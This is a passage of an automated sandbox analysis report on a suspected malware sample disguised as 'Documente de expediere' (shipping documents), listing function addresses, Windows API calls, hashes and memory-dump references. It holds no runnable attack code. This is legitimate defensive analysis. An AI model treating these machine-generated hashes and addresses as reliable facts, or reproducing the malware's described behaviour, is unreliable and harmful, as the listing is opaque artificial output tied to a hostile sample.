                                                • Instruction Fuzzy Hash: E811EB7134836EBBA7115A58DC42CFAB39DEF19374F10002AF600563C1D7B55B8146A9
                                                Function 006F4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006F454E
                                                • LoadStringW.USER32(00000000), ref: 006F4555
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006F456B
                                                • LoadStringW.USER32(00000000), ref: 006F4572
                                                • _wprintf.LIBCMT ref: 006F4598
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006F45B6
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 006F4593
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 4b054a6c1cc90707ec1eb615a322b4c3a28bde0e3af14b4708fc2b58461df2ca
                                                • Instruction ID: 7a27e4661ba331fffa4508f65516ad67c4754099f8e08ead37dcfff0370cc0de
                                                • Opcode Fuzzy Hash: 4b054a6c1cc90707ec1eb615a322b4c3a28bde0e3af14b4708fc2b58461df2ca
                                                • Instruction Fuzzy Hash: 83014FF290020CBFE750E7A49D89EF7776CDB08301F4085A6FB49D2191EA789E858B74
                                                Function 0071D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • GetSystemMetrics.USER32(0000000F), ref: 0071D78A
                                                • GetSystemMetrics.USER32(0000000F), ref: 0071D7AA
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0071D9E5
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0071DA03
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0071DA24
                                                • ShowWindow.USER32(00000003,00000000), ref: 0071DA43
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0071DA68
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0071DA8B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-0
                                                • Opcode ID: 43350ffa0be0cc6826dae4b8b57f21a4485e85ed0e88b4626258b01bcf17b64e
                                                • Instruction ID: c142a97ccd502ceeee9bc8964e2b76b8aa62acee642fc7a45aae7370890ad2d3
                                                • Opcode Fuzzy Hash: 43350ffa0be0cc6826dae4b8b57f21a4485e85ed0e88b4626258b01bcf17b64e
                                                • Instruction Fuzzy Hash: 87B15771600225ABDF28CF6DC9897E97BB2FF44711F08C169ED489A295D738AD90CF90
                                                Function 00692A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000), ref: 00692ACF
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000,000000FF), ref: 00692B17
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000), ref: 006CC46A
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000), ref: 006CC4D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 1f2dbbaf327d3864ad1d6c90225304acab987433cb3cee4f759704fa5b0f316b
                                                • Instruction ID: d96d53e843bf3dc48db80168042c143253a4f596bbd7a6f1aaec96c5646b43ec
                                                • Opcode Fuzzy Hash: 1f2dbbaf327d3864ad1d6c90225304acab987433cb3cee4f759704fa5b0f316b
                                                • Instruction Fuzzy Hash: 6041FB32608681BACF398B2C8CBCBFA7BDBEB55314F54C41DE04B46EA1C675A846D714
                                                Function 006F7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 006F737F
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006F73B6
                                                • EnterCriticalSection.KERNEL32(?), ref: 006F73D2
                                                • _memmove.LIBCMT ref: 006F7420
                                                • _memmove.LIBCMT ref: 006F743D
                                                • LeaveCriticalSection.KERNEL32(?), ref: 006F744C
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006F7461
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F7480
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 256516436-0
                                                • Opcode ID: 2f5c8815601ad0ad2e0be460ffea0144f7abd4454e26ccfceabf69295ee29070
                                                • Instruction ID: c519dd08c6a08bbc05f6ca8555fb0863fe1962b75f5f4719ab7c0f18eb01e125
                                                • Opcode Fuzzy Hash: 2f5c8815601ad0ad2e0be460ffea0144f7abd4454e26ccfceabf69295ee29070
                                                • Instruction Fuzzy Hash: A931B271900109EBDF10EF58DC85AEF7BB9FF45310B1481A9FD04AB286DB309A50CBA8
                                                Function 00716442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 0071645A
                                                • GetDC.USER32(00000000), ref: 00716462
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0071646D
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00716479
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007164B5
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007164C6
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00719299,?,?,000000FF,00000000,?,000000FF,?), ref: 00716500
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00716520
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 9e8e0a9a40312240073101de2a81793e716a48cdc23550106004ec9fbbb4a519
                                                • Instruction ID: 338811e5795eeb472b40ae44da38a8420f21f722f67ce222199d31025734bc98
                                                • Opcode Fuzzy Hash: 9e8e0a9a40312240073101de2a81793e716a48cdc23550106004ec9fbbb4a519
                                                • Instruction Fuzzy Hash: 80316D72201214BFEB118F58DC4AFEA3FAAEF09761F048065FE089A1D1D6799851CB74
                                                Function 006EC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: c8ccc19926849e301383da79feeef370825d7497a73a2476860e1153c1edb89a
                                                • Instruction ID: 04fbe7c9a3581ce9357f49e477ac275297649b7dc3048dc8e35f527f57b49ccb
                                                • Opcode Fuzzy Hash: c8ccc19926849e301383da79feeef370825d7497a73a2476860e1153c1edb89a
                                                • Instruction Fuzzy Hash: 5C21F5F1702355BBDA50A6229C52FEF239FAF513B4B440024FD059A383F716DE5382A9
                                                Function 006FED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
                                                • _wcstok.LIBCMT ref: 006FEEFF
                                                • _wcscpy.LIBCMT ref: 006FEF8E
                                                • _memset.LIBCMT ref: 006FEFC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                • String ID: X
                                                • API String ID: 774024439-3081909835
                                                • Opcode ID: cd6c8d13a25a4f1f4fd219b5d0fd8ada318fb02c6ab8bd5864982d11945f1cb1
                                                • Instruction ID: c406997ec0e88ad39cc02dd61b9b5ca443b38a3f8b1b0c9fd924a5afd558b156
                                                • Opcode Fuzzy Hash: cd6c8d13a25a4f1f4fd219b5d0fd8ada318fb02c6ab8bd5864982d11945f1cb1
                                                • Instruction Fuzzy Hash: 49C18271508300DFCB64EF28C881AAAB7E6BF84314F04496DF599976A2DB30ED45CB96
                                                Function 00706E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00706F14
                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00706F35
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706F48
                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00706FFE
                                                • inet_ntoa.WSOCK32(?), ref: 00706FBB
                                                  • Part of subcall function 006EAE14: _strlen.LIBCMT ref: 006EAE1E
                                                  • Part of subcall function 006EAE14: _memmove.LIBCMT ref: 006EAE40
                                                • _strlen.LIBCMT ref: 00707058
                                                • _memmove.LIBCMT ref: 007070C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                • String ID:
                                                • API String ID: 3619996494-0
                                                • Opcode ID: fbc669dfc1761243f849e0de381b611b7402e3c8d1f1d7945d6e11a54a70df9b
                                                • Instruction ID: 5df2b8cf6fd85b2e410be12912c487ec41a298e7cc335ce15eb8e5028d4cac9e
                                                • Opcode Fuzzy Hash: fbc669dfc1761243f849e0de381b611b7402e3c8d1f1d7945d6e11a54a70df9b
                                                • Instruction Fuzzy Hash: 9D81E171508300EFDB54EB28CC91E6BB3EEAF84714F108A1CF5559B2E2DA75AD00C7A6
                                                Function 00691424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f653b509693a2cb5d0fa496382eebd522f91e22c8092777ae7b750619e0765d
                                                • Instruction ID: ac794b07603972e4012d72f6f11cb21b155afdd3c2534215c848c3b3de8f6b8f
                                                • Opcode Fuzzy Hash: 5f653b509693a2cb5d0fa496382eebd522f91e22c8092777ae7b750619e0765d
                                                • Instruction Fuzzy Hash: 40715D7090050AEFCF049F58CC45EFEBBBAFF8A314F248159F915AA251C734AA51CB64
                                                Function 0071B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindow.USER32(01654CF0), ref: 0071B6A5
                                                • IsWindowEnabled.USER32(01654CF0), ref: 0071B6B1
                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0071B795
                                                • SendMessageW.USER32(01654CF0,000000B0,?,?), ref: 0071B7CC
                                                • IsDlgButtonChecked.USER32(?,?), ref: 0071B809
                                                • GetWindowLongW.USER32(01654CF0,000000EC), ref: 0071B82B
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0071B843
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 91db5240ff38b74b67b22eda0c9ac17ca08472528153cfe91d45360ba45b6ad0
                                                • Instruction ID: 3504cb5b2ee3b14527eea1f4f81368f40221b2b985462f896403f7d4af093bbc
                                                • Opcode Fuzzy Hash: 91db5240ff38b74b67b22eda0c9ac17ca08472528153cfe91d45360ba45b6ad0
                                                • Instruction Fuzzy Hash: D7718C34600304EFDB209F68C8D5FEA7BB9EF59300F1484AAE955972E1C739AD81CB54
                                                Function 0070F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0070F75C
                                                • _memset.LIBCMT ref: 0070F825
                                                • ShellExecuteExW.SHELL32(?), ref: 0070F86A
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
                                                • GetProcessId.KERNEL32(00000000), ref: 0070F8E1
                                                • CloseHandle.KERNEL32(00000000), ref: 0070F910
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                • String ID: @
                                                • API String ID: 3522835683-2766056989
                                                • Opcode ID: f995cf99ff89f2594fb45bec30fc7cd10d79a85429d8abb40b05911cc2f5df16
                                                • Instruction ID: 9cb5af9e2cbd2181e770cd49c246974ab15c4615e53dff60534c2d3a7b49ee1f
                                                • Opcode Fuzzy Hash: f995cf99ff89f2594fb45bec30fc7cd10d79a85429d8abb40b05911cc2f5df16
                                                • Instruction Fuzzy Hash: 7A61AF75A00619DFCF14EF58C4809AEBBFAFF48310B14856DE846AB791CB34AD41CB98
                                                Function 006F145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 006F149C
                                                • GetKeyboardState.USER32(?), ref: 006F14B1
                                                • SetKeyboardState.USER32(?), ref: 006F1512
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 006F1540
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 006F155F
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 006F15A5
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006F15C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
                                                • Instruction ID: 89fc63289efdde26ce056dfada3e92be6765fa857819410581e56f236ba50988
                                                • Opcode Fuzzy Hash: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
                                                • Instruction Fuzzy Hash: 5D5104A06043D9BEFB3246348C05BFA7EEB6B47344F08848DE2D58E9C2C298DC84D750
                                                Function 006F1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(00000000), ref: 006F12B5
                                                • GetKeyboardState.USER32(?), ref: 006F12CA
                                                • SetKeyboardState.USER32(?), ref: 006F132B
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006F1357
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006F1374
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006F13B8
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006F13D9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
                                                • Instruction ID: a356d94d058e409f5c41224bfe00b85976c432ace7070bb7c0d9ab5f98fd464f
                                                • Opcode Fuzzy Hash: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
                                                • Instruction Fuzzy Hash: D25104A15047D9BDFB3287248C45BFABFAB6F07380F088489E2D84E9C2D395AC94D754
                                                Function 006F589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$LocalTime
                                                • String ID:
                                                • API String ID: 2945705084-0
                                                • Opcode ID: 1f2b662333d539172f4b4d327fa8ec9c6fa797687c47ff913866181d50943ff2
                                                • Instruction ID: 6adb2b261d9b678becbddbfeadc389b704b1ebe96095d90278683fd9c639eaa7
                                                • Opcode Fuzzy Hash: 1f2b662333d539172f4b4d327fa8ec9c6fa797687c47ff913866181d50943ff2
                                                • Instruction Fuzzy Hash: 8D41D8A5C2012876CB51EBB4CC869DF73AAAF04310F50856AF619E3222FB34D755C7AD
                                                Function 006EDA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006EDAC5
                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006EDAFB
                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006EDB0C
                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006EDB8E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                • String ID: ,,r$DllGetClassObject
                                                • API String ID: 753597075-4218317632
                                                • Opcode ID: d2d7d97046c93406e509bc50a2bd709294dd1e6d388d2c058c04ef7479e18d07
                                                • Instruction ID: 28e644f695e66440a38319526ae36674e1449976cfc1f15a9fbc8c919ed10753
                                                • Opcode Fuzzy Hash: d2d7d97046c93406e509bc50a2bd709294dd1e6d388d2c058c04ef7479e18d07
                                                • Instruction Fuzzy Hash: 1E41C3B1602348EFDB05CF16C884A9A7BBAEF44350F1181ADED059F245E7B0DD40CBA0
                                                Function 006F38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                Download Yara Rule
